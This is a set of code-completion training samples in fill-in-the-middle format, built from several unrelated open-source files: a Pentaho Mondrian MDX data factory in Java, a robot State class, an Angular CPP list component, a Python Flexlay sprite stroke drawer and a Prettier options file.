formatString, locale ); return messageFormat.format( new Object[] { o } ); } public Set<String> getCollectedParameter() { return Collections.unmodifiableSet( (Set<String>) collectedParameter.clone() ); } } private static final String ACCEPT_ROLES_CONFIG_KEY = "org.pentaho.reporting.engine.classic.extensions.datasources.mondrian.role-filter.static.accept"; private static final String ACCEPT_REGEXP_CONFIG_KEY = "org.pentaho.reporting.engine.classic.extensions.datasources.mondrian.role-filter.reg-exp.accept"; private static final String DENY_ROLE_CONFIG_KEY = "org.pentaho.reporting.engine.classic.extensions.datasources.mondrian.role-filter.static.deny"; private static final String DENY_REGEXP_CONFIG_KEY = "org.pentaho.reporting.engine.classic.extensions.datasources.mondrian.role-filter.reg-exp.deny"; private static final String ROLE_FILTER_ENABLE_CONFIG_KEY = "org.pentaho.reporting.engine.classic.extensions.datasources.mondrian.role-filter.enable"; private String jdbcUser; private String jdbcUserField; private String jdbcPassword; private String jdbcPasswordField; private String dynamicSchemaProcessor; private Boolean useSchemaPool; private Boolean useContentChecksum; private Properties baseConnectionProperties; private String role; private String roleField; private CubeFileProvider cubeFileProvider; private DataSourceProvider dataSourceProvider; private MondrianConnectionProvider mondrianConnectionProvider; private String designTimeName; private transient Connection connection; private static final String[] EMPTY_QUERYNAMES = new String[ 0 ]; private static final Log logger = LogFactory.getLog( AbstractMDXDataFactory.class ); private boolean membersOnAxisSorted; public AbstractMDXDataFactory() { this.mondrianConnectionProvider = ClassicEngineBoot.getInstance().getObjectFactory().get( MondrianConnectionProvider.class ); 
this.baseConnectionProperties = new Properties(); } public MondrianConnectionProvider getMondrianConnectionProvider() { return mondrianConnectionProvider; } public void setMondrianConnectionProvider( final MondrianConnectionProvider mondrianConnectionProvider ) { if ( mondrianConnectionProvider == null ) { throw new NullPointerException(); } this.mondrianConnectionProvider = mondrianConnectionProvider; } public String getDynamicSchemaProcessor() { return dynamicSchemaProcessor; } public void setDynamicSchemaProcessor( final String dynamicSchemaProcessor ) { this.dynamicSchemaProcessor = dynamicSchemaProcessor; } public boolean isMembersOnAxisSorted() { return membersOnAxisSorted; } public void setMembersOnAxisSorted( final boolean membersOnAxisSorted ) { this.membersOnAxisSorted = membersOnAxisSorted; } public Boolean isUseSchemaPool() { return useSchemaPool; } public void setUseSchemaPool( final Boolean useSchemaPool ) { this.useSchemaPool = useSchemaPool; } public Boolean isUseContentChecksum() { return useContentChecksum; } public void setUseContentChecksum( final Boolean useContentChecksum ) { this.useContentChecksum = useContentChecksum; } public String getRole() { return role; } public void setRole( final String role ) { this.role = role; } public String getRoleField() { return roleField; } public void setRoleField( final String roleField ) { this.roleField = roleField; } public CubeFileProvider getCubeFileProvider() { return cubeFileProvider; } public void setCubeFileProvider( final CubeFileProvider cubeFileProvider ) { this.cubeFileProvider = cubeFileProvider; } public DataSourceProvider getDataSourceProvider() { return dataSourceProvider; } public void setDataSourceProvider( final DataSourceProvider dataSourceProvider ) { this.dataSourceProvider = dataSourceProvider; } public String getJdbcUser() { return jdbcUser; } public void setJdbcUser( final String jdbcUser ) { this.jdbcUser = jdbcUser; } public String getJdbcPassword() { return jdbcPassword; } public void setJdbcPassword( final String jdbcPassword ) { this.jdbcPassword = jdbcPassword; } public String getJdbcUserField() { return jdbcUserField; } public void setJdbcUserField( final String jdbcUserField ) { this.jdbcUserField = jdbcUserField; } public String getJdbcPasswordField() { return jdbcPasswordField; } public void setJdbcPasswordField( final String jdbcPasswordField ) { this.jdbcPasswordField = jdbcPasswordField; } public Properties getBaseConnectionProperties() { return (Properties) baseConnectionProperties.clone(); } /** * Sets base connection properties. These will be overriden by any programatically set properties. * * @param connectionProperties */ public void setBaseConnectionProperties( final Properties connectionProperties ) { if ( connectionProperties != null ) { this.baseConnectionProperties.clear(); this.baseConnectionProperties.putAll( connectionProperties ); } } /** * Checks whether the query would be executable by this datafactory. This performs a rough check, not a full query. * * @param query * @param parameters * @return */ public boolean isQueryExecutable( final String query, final DataRow parameters ) { return true; } /** * Closes the data factory and frees all resources held by this instance. */ public void close() { if ( connection != null ) { connection.close(); } connection = null; } /** * Access the cache control on a per-datasource level. Setting "onlyCurrentSchema" to true will selectively purge the * mondrian cache for the specifc schema only. 
* * @param parameters * @param onlyCurrentSchema * @throws ReportDataFactoryException */ public void clearCache( final DataRow parameters, final boolean onlyCurrentSchema ) throws ReportDataFactoryException { try { final Connection connection = mondrianConnectionProvider .createConnection( computeProperties( parameters ), dataSourceProvider.getDataSource() ); try { final CacheControl cacheControl = connection.getCacheControl( null ); if ( onlyCurrentSchema ) { cacheControl.flushSchema( connection.getSchema() ); } else { cacheControl.flushSchemaCache(); } } finally { connection.close(); } } catch ( SQLException e ) { logger.error( e ); throw new ReportDataFactoryException( "Failed to create DataSource (SQL Exception - error code: " + e.getErrorCode() + "):" + e.toString(), e ); } catch ( MondrianException e ) { logger.error( e ); throw new ReportDataFactoryException( "Failed to create DataSource (Mondrian Exception):" + e.toString(), e ); } } /** * Queries a datasource. The string 'query' defines the name of the query. The Parameterset given here may contain * more data than actually needed for the query. * <p/> * The parameter-dataset may change between two calls, do not assume anything, and do not hold references to the * parameter-dataset or the position of the columns in the dataset. * * @param rawMdxQuery the mdx Query string. * @param parameters the parameters for the query * @return the result of the query as table model. * @throws org.pentaho.reporting.engine.classic.core.ReportDataFactoryException if an error occured while performing * the query. */ public Result performQuery( final String rawMdxQuery, final DataRow parameters ) throws ReportDataFactoryException { try { if ( connection == null ) { connection = mondrianConnectionProvider .createConnection( computeProperties( parameters ), dataSourceProvider.getDataSource() ); } } catch ( SQLException e ) { throw new ReportDataFactoryException( "Failed to create datasource:" + e.getLocalizedMessage(), e ); } catch ( MondrianException e ) { throw new ReportDataFactoryException( "Failed to create datasource:" + e.getLocalizedMessage(), e ); } try { if ( connection == null ) { throw new ReportDataFactoryException( "Factory is closed." ); } final MDXCompiler compiler = new MDXCompiler( parameters, getLocale() ); final String mdxQuery = compiler.translateAndLookup( rawMdxQuery, parameters ); // Alternatively, JNDI is possible. Maybe even more .. 
final Query query = connection.parseQuery( mdxQuery ); final Statement statement = query.getStatement(); final int queryTimeoutValue = calculateQueryTimeOut( parameters ); if ( queryTimeoutValue > 0 ) { statement.setQueryTimeoutMillis( queryTimeoutValue * 1000 ); } parametrizeQuery( parameters, query ); //noinspection deprecation final Result resultSet = connection.execute( query ); if ( resultSet == null ) { throw new ReportDataFactoryException( "query returned no resultset" ); } return resultSet; } catch ( MondrianException e ) { throw new ReportDataFactoryException( "Failed to create datasource:" + e.getLocalizedMessage(), e ); } } private void parametrizeQuery( final DataRow parameters, final Query query ) throws ReportDataFactoryException { final Parameter[] parameterDefs = query.getParameters(); for ( int i = 0; i < parameterDefs.length; i++ ) { final Parameter def = parameterDefs[ i ]; final Type parameterType = def.getType(); final Object parameterValue = preprocessMemberParameter( def, parameters, parameterType ); final Object processedParamValue = computeParameterValue( query, parameterValue, parameterType ); // Mondrian allows null values to be passed in, so we'll go ahead and // convert null values to their defaults for now until MONDRIAN-745 is // resolved. final Exp exp = def.getDefaultExp(); if ( processedParamValue == null && exp != null && exp instanceof Literal ) { Literal exp1 = (Literal) exp; def.setValue( exp1.getValue() ); } else { def.setValue( processedParamValue ); } } } private Object preprocessMemberParameter( final Parameter def, final DataRow parameters, final Type parameterType ) { Object parameterValue = parameters.get( def.getName() ); // Mondrian doesn't handle null MemberType/SetType parameters well (http://jira.pentaho.com/browse/MONDRIAN-745) // If parameterValue is null, give it the default value if ( parameterValue != null ) { return parameterValue; } try { if ( parameterType instanceof MemberType || parameterType instanceof SetType ) { return def.getDefaultExp().toString(); } } catch ( final Exception e ) { // Ignore - this is a safety procedure anyway } return null; } private Object computeParameterValue( final Query query, final Object parameterValue, final Type parameterType ) throws ReportDataFactoryException { final Object processedParamValue; if ( parameterValue != null ) { if ( parameterType instanceof StringType ) { if ( !( parameterValue instanceof String ) ) { throw new ReportDataFactoryException( parameterValue + " is incorrect for type " + parameterType ); } processedParamValue = parameterValue; } else if ( parameterType instanceof NumericType ) { if ( !( parameterValue instanceof Number ) ) { throw new ReportDataFactoryException( parameterValue + " is incorrect for type " + parameterType ); } processedParamValue = parameterValue; } else if ( parameterType instanceof MemberType ) { final MemberType memberType = (MemberType) parameterType; final Hierarchy hierarchy = memberType.getHierarchy(); if ( parameterValue instanceof String ) { final Member member = findMember( query, hierarchy, query.getCube(), String.valueOf( parameterValue ) ); if ( member != null ) { processedParamValue = new MemberExpr( member ); } else { processedParamValue = null; } } else { if ( !( parameterValue instanceof OlapElement ) ) { throw new ReportDataFactoryException( parameterValue + " is incorrect for type " + parameterType ); } else { processedParamValue = parameterValue; } } } else if ( parameterType instanceof SetType ) { final SetType setType = (SetType) 
parameterType; final Hierarchy hierarchy = setType.getHierarchy(); if ( parameterValue instanceof String ) { final String rawString = (String) parameterValue; final String[] memberStr = rawString.replaceFirst( "^ *\\{", "" ).replaceFirst( "} *$", "" ).split( "," ); final List<Member> list = new ArrayList<Member>( memberStr.length ); for ( int j = 0; j < memberStr.length; j++ ) { final String str = memberStr[ j ]; final Member member = findMember( query, hierarchy, query.getCube(), String.valueOf( str ) ); if ( member != null ) { list.add( member ); } } processedParamValue = list; } else { if ( !( parameterValue instanceof OlapElement ) ) { throw new ReportDataFactoryException( parameterValue + " is incorrect for type " + parameterType ); } else { processedParamValue = parameterValue; } } } else { processedParamValue = parameterValue; } } else { processedParamValue = null; } return processedParamValue; } private Member findMember( final Query query, final Hierarchy hierarchy, final Cube cube, final String parameter ) throws ReportDataFactoryException { try { final Member directValue = yuckyInternalMondrianLookup( query, hierarchy, parameter ); if ( directValue != null ) { return directValue; } } catch ( Exception e ) { // It is non fatal if that fails. Invalid input has this effect. } Member memberById = null; Member memberByUniqueId = null; final boolean searchForNames = MondrianProperties.instance().NeedDimensionPrefix.get() == false; final boolean missingMembersIsFatal = MondrianProperties.instance().IgnoreInvalidMembersDuringQuery.get(); try { final Member directValue = lookupDirectly( hierarchy, cube, parameter, searchForNames ); if ( directValue != null ) { return directValue; } } catch ( Exception e ) { // It is non fatal if that fails. Invalid input has this effect. } final Query memberQuery = connection.parseQuery( "SELECT " + hierarchy.getQualifiedName() // NON-NLS + ".AllMembers ON 0, {} ON 1 FROM " + cube.getQualifiedName() ); // NON-NLS final Result result = connection.execute( memberQuery ); try { final List<Position> positionList = result.getAxes()[ 0 ].getPositions(); for ( int i = 0; i < positionList.size(); i++ ) { final Position position = positionList.get( i ); for ( int j = 0; j < position.size(); j++ ) { final Member member = position.get( j ); if ( parameter.equals( MondrianUtil.getUniqueMemberName( member ) ) ) { if ( memberByUniqueId == null ) { memberByUniqueId = member; } else { logger .warn( "Encountered a member with a duplicate unique key: " + member.getQualifiedName() ); // NON-NLS } } if ( searchForNames == false ) { continue; } if ( parameter.equals( member.getName() ) ) { if ( memberById == null ) { memberById = member; } else { logger.warn( "Encountered a member with a duplicate name: " + member.getQualifiedName() ); // NON-NLS } } } } } finally { result.close(); } if ( memberByUniqueId != null ) { return memberByUniqueId; } if ( memberById != null ) { return memberById; } if ( missingMembersIsFatal ) { throw new ReportDataFactoryException( "No member matches parameter value '" + parameter + "'." 
); } return null; } private Member lookupDirectly( final Hierarchy hierarchy, final Cube cube, final String parameter, final boolean searchForNames ) { Member memberById = null; Member memberByUniqueId = null; final Query queryDirect = connection.parseQuery( "SELECT STRTOMEMBER(" + quote( parameter ) + ") ON 0, {} ON 1 FROM " // NON-NLS + cube.getQualifiedName() ); final Result resultDirect = connection.execute( queryDirect ); try { final List<Position> positionList = resultDirect.getAxes()[ 0 ].getPositions(); for ( int i = 0; i < positionList.size(); i++ ) { final Position position = positionList.get( i ); for ( int j = 0; j < position.size(); j++ ) { final Member member = position.get( j ); // If the parameter starts with '[', we'll assume we have the full // member specification specification. Otherwise, keep the funky lookup // route. We do check whether we get a second member (heck, should not // happen, but I've seen pigs fly already). if ( parameter.startsWith( "[" ) ) { if ( memberByUniqueId == null ) { memberByUniqueId = member; } else { logger.warn( "Encountered a member with a duplicate key: " + member.getQualifiedName() ); // NON-NLS } } if ( searchForNames == false ) { continue; } if ( parameter.equals( member.getName() ) ) { if ( memberById == null ) { memberById = member; } else { logger.warn( "Encountered a member with a duplicate name: " + member.getQualifiedName() ); // NON-NLS } } } } } finally { resultDirect.close(); } if ( memberByUniqueId != null ) { final Hierarchy memberHierarchy = memberByUniqueId.getHierarchy(); if ( hierarchy != memberHierarchy ) { if ( ObjectUtilities.equal( hierarchy, memberHierarchy ) == false ) { logger .warn( "Cannot match hierarchy of member found with the hierarchy specfied in the parameter: " // NON-NLS + "Unabe to guarantee that the correct member has been queried, returning null." 
); // NON-NLS return null; } } return memberByUniqueId; } if ( memberById != null ) { final Hierarchy memberHierarchy = memberById.getHierarchy(); if ( hierarchy != memberHierarchy ) { if ( ObjectUtilities.equal( hierarchy, memberHierarchy ) == false ) { logger .warn( "Cannot match hierarchy of member found with the hierarchy specfied in the parameter: " // NON-NLS + "Unabe to guarantee that the correct member has been queried, returning null" ); // NON-NLS return null; } } return memberById; } return null; } protected Member yuckyInternalMondrianLookup( final Query query, final Hierarchy hierarchy, final String parameter ) { final Member memberById = (Member) Util.lookup( query, Util.parseIdentifier( parameter ) ); if ( memberById != null ) { final Hierarchy memberHierarchy = memberById.getHierarchy(); if ( hierarchy != memberHierarchy ) { if ( ObjectUtilities.equal( hierarchy, memberHierarchy ) == false ) { logger .warn( "Cannot match hierarchy of member found with the hierarchy specfied in the parameter: " // NON-NLS + "Unabe to guarantee that the correct member has been queried, returning null" ); // NON-NLS return null; } } return memberById; } return null; } protected int extractQueryLimit( final DataRow parameters ) { final Object queryLimit = parameters.get( DataFactory.QUERY_LIMIT ); final int queryLimitValue; if ( queryLimit instanceof Number ) { final Number i = (Number) queryLimit; queryLimitValue = Math.max( 0, i.intValue() ); } else { // means no limit at all queryLimitValue = 0; } return queryLimitValue; } private String computeRole( final DataRow parameters ) throws ReportDataFactoryException { if ( roleField != null ) { final Object field = parameters.get( roleField ); if ( field != null ) { if ( field instanceof Object[] ) { final Object[] roleArray = (Object[]) field; final StringBuffer buffer = new StringBuffer(); final int length = roleArray.length; for ( int i = 0; i < length; i++ ) { final Object o = roleArray[ i ]; if ( o == null ) { continue; } final String role = filter( String.valueOf( o ) ); if ( role == null ) { continue; } buffer.append( quoteRole( role ) ); } return buffer.toString(); } else if ( field.getClass().isArray() ) { final StringBuffer buffer = new StringBuffer(); final int length = Array.getLength( field ); for ( int i = 0; i < length; i++ ) { final Object o = Array.get( field, i ); if ( o == null ) { continue; } final String role = filter( String.valueOf( o ) ); if ( role == null ) { continue; } buffer.append( quoteRole( role ) ); } return buffer.toString(); } final String role = filter( String.valueOf( field ) ); if ( role != null ) { return role; } } } return filter( role ); } private String quoteRole( final String role ) { if ( role.indexOf( ',' ) == -1 ) { return role; } final StringBuffer b = new StringBuffer( role.length() + 5 ); final char[] chars = role.toCharArray(); for ( int i = 0; i < chars.length; i++ ) { final char c = chars[ i ]; if ( c == ',' ) { b.append( c ); } b.append( c ); } return b.toString(); } private String computeJdbcUser( final DataRow parameters ) { if ( jdbcUserField != null ) { final Object field = parameters.get( jdbcUserField ); if ( field != null ) { return String.valueOf( field ); } } return jdbcUser; } private String computeJdbcPassword( final DataRow parameters ) { if ( jdbcPasswordField != null ) { final Object field = parameters.get( jdbcPasswordField );<|fim▁hole|> } } return jdbcPassword; } private Properties computeProperties( final DataRow parameters ) throws ReportDataFactoryException { if ( 
cubeFileProvider == null ) { throw new ReportDataFactoryException( "No CubeFileProvider" ); } final Properties properties = getBaseConnectionProperties(); final String catalog = cubeFileProvider.getCubeFile( getResourceManager(), getContextKey() ); if ( catalog == null ) { throw new ReportDataFactoryException( "No valid catalog given." ); } properties.setProperty( "Catalog", catalog ); // NON-NLS final String role = computeRole( parameters ); if ( role != null ) { properties.setProperty( "Role", role ); // NON-NLS } final String jdbcUser = computeJdbcUser( parameters ); if ( StringUtils.isEmpty( jdbcUser ) == false ) { properties.setProperty( "JdbcUser", jdbcUser ); // NON-NLS } final String jdbcPassword = computeJdbcPassword( parameters ); if ( StringUtils.isEmpty( jdbcPassword ) == false ) { properties.setProperty( "JdbcPassword", jdbcPassword ); // NON-NLS } final Locale locale = getLocale(); if ( locale != null ) { properties.setProperty( "Locale", locale.toString() ); // NON-NLS } if ( isUseContentChecksum() != null ) { properties.setProperty( "UseContentChecksum", String.valueOf( isUseContentChecksum() ) ); // NON-NLS } if ( isUseSchemaPool() != null ) { properties.setProperty( "UseSchemaPool", String.valueOf( isUseSchemaPool() ) ); // NON-NLS } if ( getDynamicSchemaProcessor() != null ) { properties.setProperty( "DynamicSchemaProcessor", getDynamicSchemaProcessor() ); // NON-NLS } return properties; } public AbstractMDXDataFactory clone() { final AbstractMDXDataFactory dataFactory = (AbstractMDXDataFactory) super.clone(); dataFactory.connection = null; if ( this.baseConnectionProperties != null ) { dataFactory.baseConnectionProperties = (Properties) this.baseConnectionProperties.clone(); } return dataFactory; } public String getDesignTimeName() { return designTimeName; } public void setDesignTimeName( final String designTimeName ) { this.designTimeName = designTimeName; } /** * Returns all known query-names. A data-factory may accept more than the query-names returned here. * * @return the known query names. */ public String[] getQueryNames() { return EMPTY_QUERYNAMES; } /** * Attempts to cancel the query process that is generating the data for this data factory. If it is not possible to * cancel the query, this call should be ignored. */ public void cancelRunningQuery() { } protected static String quote( final String original ) { // This solution needs improvements. Copy blocks instead of single // characters. 
final int length = original.length(); final StringBuffer b = new StringBuffer( length * 12 / 10 ); b.append( '"' ); for ( int i = 0; i < length; i++ ) { final char c = original.charAt( i ); if ( c == '"' ) { b.append( '"' ); b.append( '"' ); } else { b.append( c ); } } b.append( '"' ); return b.toString(); } private String filter( final String role ) throws ReportDataFactoryException { final Configuration configuration = ClassicEngineBoot.getInstance().getGlobalConfig(); if ( "true".equals( configuration.getConfigProperty( ROLE_FILTER_ENABLE_CONFIG_KEY ) ) == false ) { return role; } final Iterator staticDenyKeys = configuration.findPropertyKeys( DENY_ROLE_CONFIG_KEY ); while ( staticDenyKeys.hasNext() ) { final String key = (String) staticDenyKeys.next(); final String value = configuration.getConfigProperty( key ); if ( ObjectUtilities.equal( value, role ) ) { return null; } } final Iterator regExpDenyKeys = configuration.findPropertyKeys( DENY_REGEXP_CONFIG_KEY ); while ( regExpDenyKeys.hasNext() ) { final String key = (String) regExpDenyKeys.next(); final String value = configuration.getConfigProperty( key ); try { if ( role.matches( value ) ) { return null; } } catch ( PatternSyntaxException pe ) { throw new ReportDataFactoryException( "Unable to match reg-exp role filter:", pe ); } } boolean hasAccept = false; final Iterator staticAcceptKeys = configuration.findPropertyKeys( ACCEPT_ROLES_CONFIG_KEY ); while ( staticAcceptKeys.hasNext() ) { hasAccept = true; final String key = (String) staticAcceptKeys.next(); final String value = configuration.getConfigProperty( key ); if ( ObjectUtilities.equal( value, role ) ) { return role; } } final Iterator regExpAcceptKeys = configuration.findPropertyKeys( ACCEPT_REGEXP_CONFIG_KEY ); while ( regExpAcceptKeys.hasNext() ) { hasAccept = true; final String key = (String) regExpAcceptKeys.next(); final String value = configuration.getConfigProperty( key ); try { if ( role.matches( value ) ) { return role; } } catch ( PatternSyntaxException pe ) { throw new ReportDataFactoryException( "Unable to match reg-exp role filter:", pe ); } } if ( hasAccept == false ) { return role; } return null; } protected String translateQuery( final String query ) { return query; } protected String computedQuery( final String queryName, final DataRow parameters ) throws ReportDataFactoryException { return queryName; } public ArrayList<Object> getQueryHash( final String queryRaw, final DataRow parameter ) throws ReportDataFactoryException { final ArrayList<Object> list = new ArrayList<Object>(); list.add( getClass().getName() ); list.add( translateQuery( queryRaw ) ); if ( getCubeFileProvider() != null ) { list.add( getCubeFileProvider().getConnectionHash() ); } if ( getDataSourceProvider() != null ) { list.add( getDataSourceProvider().getConnectionHash() ); } list.add( getMondrianConnectionProvider().getConnectionHash( computeProperties( parameter ) ) ); list.add( computeProperties( parameter ) ); return list; } public String[] getReferencedFields( final String queryName, final DataRow parameters ) throws ReportDataFactoryException { final boolean isNewConnection = connection == null; try { if ( connection == null ) { connection = mondrianConnectionProvider.createConnection ( computeProperties( parameters ), dataSourceProvider.getDataSource() ); } } catch ( SQLException e ) { logger.error( e ); throw new ReportDataFactoryException( "Failed to create DataSource (SQL Exception - error code: " + e.getErrorCode() + "):" + e.toString(), e ); } catch ( MondrianException e ) { 
logger.error( e ); throw new ReportDataFactoryException( "Failed to create DataSource (Mondrian Exception):" + e.toString(), e ); } try { if ( connection == null ) { throw new ReportDataFactoryException( "Factory is closed." ); } final LinkedHashSet<String> parameter = new LinkedHashSet<String>(); final MDXCompiler compiler = new MDXCompiler( parameters, getLocale() ); final String computedQuery = computedQuery( queryName, parameters ); final String mdxQuery = compiler.translateAndLookup( computedQuery, parameters ); parameter.addAll( compiler.getCollectedParameter() ); // Alternatively, JNDI is possible. Maybe even more .. final Query query = connection.parseQuery( mdxQuery ); final Parameter[] queryParameters = query.getParameters(); for ( int i = 0; i < queryParameters.length; i++ ) { final Parameter queryParameter = queryParameters[ i ]; parameter.add( queryParameter.getName() ); } if ( jdbcUserField != null ) { parameter.add( jdbcUserField ); } if ( roleField != null ) { parameter.add( roleField ); } parameter.add( DataFactory.QUERY_LIMIT ); return parameter.toArray( new String[ parameter.size() ] ); } catch ( MondrianException e ) { throw new ReportDataFactoryException( "Failed to create datasource:" + e.getLocalizedMessage(), e ); } finally { if ( isNewConnection ) { close(); } } } public void initialize( final DataFactoryContext dataFactoryContext ) throws ReportDataFactoryException { super.initialize( dataFactoryContext ); membersOnAxisSorted = "true".equals ( dataFactoryContext.getConfiguration() .getConfigProperty( MondrianDataFactoryModule.MEMBER_ON_AXIS_SORTED_KEY ) ); } }<|fim▁end|>
if ( field != null ) { return String.valueOf( field );
<|file_name|>State.java<|end_file_name|><|fim▁begin|>package org.usfirst.frc.team5940.states; import edu.wpi.first.wpilibj.RobotBase; public abstract class State implements Runnable { @SuppressWarnings("unused") protected RobotBase robot; //Update recall delay private int delay = 25; /** * Constructor * @param robot Saved in this class, allows states to determine information about the robot. This should be passed the subclass of RobotBase of your code. */ public State (RobotBase robot){ //Set the robot this.robot = robot; } /** * Overriden run method for Runnable superclass. Started with STATE_RUNNABLE_NAME.run(); or STATE_THREAD_NAME.start(); */ @Override public void run() { //Initilize this.init(); //Continue until interupdete while (!Thread.interrupted()) { //Update update(); //try to sleep try { Thread.sleep(delay); } catch (InterruptedException e) { /*Print the error*/e.printStackTrace(); } } } /** * Called once right after run() is called, even if the Thread is interrupted. */ <|fim▁hole|> /** * Called forever with a delay of delay (the var) while the Thread is not interrupted. */ protected abstract void update(); }<|fim▁end|>
protected abstract void init();
<|file_name|>cpp-list.component.ts<|end_file_name|><|fim▁begin|>import { Component, OnInit, Input, ChangeDetectorRef } from '@angular/core'; import { Cpp } from '../../../shared/interfaces/cpps.interface'; import { FormBuilder, FormGroup, Validators, FormArray } from '@angular/forms'; import { Subject } from 'rxjs/Subject'; import { ActivatedRoute } from '@angular/router'; import { FormSetService } from '../../../services/form-set.service'; import { CppTip, CppGrad, CppEmitent } from '../../../shared/models/registre.model'; @Component({ selector: 'app-cpp-list', templateUrl: './cpp-list.component.html', styleUrls: ['./cpp-list.component.css'] }) export class CppListComponent implements OnInit { // child notifies if new add is finished public static addNewActive: Subject<boolean> = new Subject(); @Input('cppFormData') public cppFormData: Cpp[]; public formCpps: FormGroup; public registruCpp; public registruCppTip: CppTip[] = [ { id: 1, nume: 'Rezident' }, { id: 2, nume: 'Specialitate Medicala' }, { id: 3, nume: 'Supraspecializare' }, { id: 4, nume: 'Competenta' }, { id: 5, nume: 'Atestat de studii complementare' }, { id: 6, nume: 'Abilitate' } ]; public registruCppGrad: CppGrad[] = [ { id: 1, nume: 'Specialist' }, { id: 2, nume: 'Primar' } ]; public registruCppEmitent: CppEmitent[] = [ { id: 'MS', nume: 'Ministerul Sanatatii' }, { id: 'AL', nume: 'Alt Emitent' } ];<|fim▁hole|> private _cd: ChangeDetectorRef, private _rounterSnapshot: ActivatedRoute, private _formSet: FormSetService, private _fb: FormBuilder, ) { } ngOnInit() { this.registruCpp = this._rounterSnapshot.snapshot.data['regCpp']; this.setForm(); CppListComponent.addNewActive.subscribe(res => { this.addActive = res; }); } private setForm(): void { this.formCpps = this._formSet.cpps('initFormCpps', null, this.formCpps); // TODO; de revazut daca nu il putem baga in serviciul de mai sus this.formCpps.addControl('cpps', new FormArray([])); } addCpp() { const newCppData: Cpp = { 'id_cpp': null, // 212, 'id_mem': null, // 126, 'reg_cpp_tip_id': null, // 2, 'reg_cpp_id': null, // 1034, 'grad_prof_cpp_id': null, // 1, 'date_start': '', // '2007-12-01', 'date_end': '', // '0000-00-00', 'emitent': '', // 'MS', 'act_serie': '', // 'ZX', 'act_numar': '', // 1234, 'act_data': '', // '2008-01-08', 'act_descriere': '', // '', 'obs': '', // 'nu are', 'updated': '', // '2017-04-08 09:59:32', 'ro': '', // 'false' }; this.cppFormData.unshift(newCppData); this._cd.detectChanges(); this.addActive = !this.addActive; return false; } }<|fim▁end|>
addActive = true; constructor(
<|file_name|>sprite_stroke_drawer.py<|end_file_name|><|fim▁begin|># Flexlay - A Generic 2D Game Editor # Copyright (C) 2014 Ingo Ruhnke <[email protected]> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from flexlay.wip.bitmap_layer import BitmapLayer from flexlay.blend_func import BlendFunc from flexlay import DrawerProperties from flexlay.math import Rect, Point, Size, Origin class Surface: pass class SpriteStrokeDrawer: def __init__(self, drawer): self.mode = SpriteStrokeDrawer.DM_NORMAL self.drawer = drawer def draw(self, stroke, gc): if DrawerProperties.current.get_brush().is_null() or stroke.get_dab_count() == 0: return dabs = stroke.get_interpolated_dabs(DrawerProperties.current.get_spacing() * DrawerProperties.current.get_size(), DrawerProperties.current.get_spacing() * DrawerProperties.current.get_size()) for i, dab in enumerate(self.dabs): sprite = DrawerProperties.current.get_brush().get_sprite() color = DrawerProperties.current.get_color() sprite.set_color(color) sprite.set_alpha((color.get_alpha() / 255.0) * dab.pressure) sprite.set_scale(DrawerProperties.current.get_size() * dab.pressure, DrawerProperties.current.get_size() * dab.pressure) if gc is not None: # DO Multipass: # 1: GL_ZERO, GL_DST_ALPHA # 2: GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA # brush.set_blend_func_separate(BlendFunc.zero, BlendFunc.dst_alpha, # BlendFunc.zero, BlendFunc.one) # brush.draw(dab.pos.x, dab.pos.y, gc) if self.mode == SpriteStrokeDrawer.DM_NORMAL: sprite.set_blend_func_separate(BlendFunc.src_alpha, BlendFunc.one_minus_src_alpha, BlendFunc.one, BlendFunc.one_minus_src_alpha) sprite.draw(dab.pos.x, dab.pos.y, gc.gc) elif self.mode == SpriteStrokeDrawer.DM_ADDITION: sprite.set_blend_func_separate(BlendFunc.src_alpha, BlendFunc.one, BlendFunc.zero, BlendFunc.one) # BlendFunc.one, BlendFunc.one_minus_src_alpha) sprite.draw(dab.pos.x, dab.pos.y, gc.gc) elif self.mode == SpriteStrokeDrawer.DM_ERASE: sprite.set_blend_func(BlendFunc.zero, BlendFunc.one_minus_src_alpha) sprite.draw(dab.pos.x, dab.pos.y, gc.gc) elif self.mode == SpriteStrokeDrawer.DM_SMUDGE: if dab != dabs[0]: canvas = BitmapLayer.current.get_canvas() buffer = canvas.get_pixeldata( Rect(Point(int(self.dabs[i - 1].pos.x) - sprite.width / 2, int(self.dabs[i - 1].pos.y) - sprite.height / 2), Size(sprite.width, sprite.height))) surface = Surface(buffer) # surface.set_blend_func_separate(BlendFunc.src_alpha, BlendFunc.one_minus_src_alpha, # BlendFunc.one, BlendFunc.zero) surface.set_alignment(Origin.center) surface.set_alpha(0.5)<|fim▁hole|> # surface.set_scale(DrawerProperties.current.get_size(), # DrawerProperties.current.get_size()) surface.draw(dab.pos.x, dab.pos.y, gc.gc) else: print("Error: SpriteStrokeDrawer: Unknown draw mode: ", self.mode) else: if self.mode == SpriteStrokeDrawer.DM_NORMAL: sprite.set_blend_func(BlendFunc.src_alpha, BlendFunc.one_minus_src_alpha) sprite.draw(dab.pos.x, dab.pos.y, gc.gc) elif self.mode == SpriteStrokeDrawer.DM_ADDITION: 
sprite.set_blend_func(BlendFunc.src_alpha, BlendFunc.one) sprite.draw(dab.pos.x, dab.pos.y, gc.gc) elif self.mode == SpriteStrokeDrawer.DM_ERASE: sprite.set_blend_func(BlendFunc.zero, BlendFunc.one_minus_src_alpha) sprite.draw(dab.pos.x, dab.pos.y, gc.gc) elif self.mode == SpriteStrokeDrawer.DM_SMUDGE: sprite.set_blend_func(BlendFunc.src_alpha, BlendFunc.one_minus_src_alpha) sprite.draw(dab.pos.x, dab.pos.y, gc.gc) else: print("Error: SpriteStrokeDrawer: Unknown draw mode:", self.mode) def set_mode(self, mode): self.mode = mode def get_mode(self): return self.mode # EOF #<|fim▁end|>
<|file_name|>options.js<|end_file_name|><|fim▁begin|>"use strict"; const commonOptions = require("../common/common-options"); // format based on https://github.com/prettier/prettier/blob/master/src/main/core-options.js module.exports = { bracketSpacing: commonOptions.bracketSpacing, singleQuote: commonOptions.singleQuote,<|fim▁hole|><|fim▁end|>
proseWrap: commonOptions.proseWrap };
